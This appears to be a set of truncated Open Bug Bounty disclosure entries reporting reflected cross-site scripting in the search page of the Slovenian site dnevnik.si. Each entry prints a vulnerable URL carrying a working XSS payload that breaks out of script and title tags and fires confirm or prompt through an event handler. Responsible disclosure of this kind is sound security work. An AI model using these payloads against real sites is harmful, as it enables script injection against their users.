dnevnik.si Cross Site Scripting vulnerability OBB-3869484

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

dnevnik.si XSS vulnerability

Vulnerable URL: https://www.dnevnik.si/iskalnik?q=1%3C!%27/%22/%27/%22/--%3E%3C/Script%3E%3CImage%20SrcSet=K%20/;%20OnError=confirmOPENBUGBOUNTY%20//%3E Details: Description| Value ---|--- Patched:| Verification in progress Latest check for patch:| 17.11.2017 Vulnerability type:| XSS...

dnevnik.si XSS vulnerability

Vulnerable URL: https://dnevnik.si/iskalnik?q=a%27aa%22onfocus=prompt/OPENBUGBOUNTY/%20autofocus=x%20bad=--%3E%3C/title%3E%3C/script%3E%3Cimg%20src=x%20onerror=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly...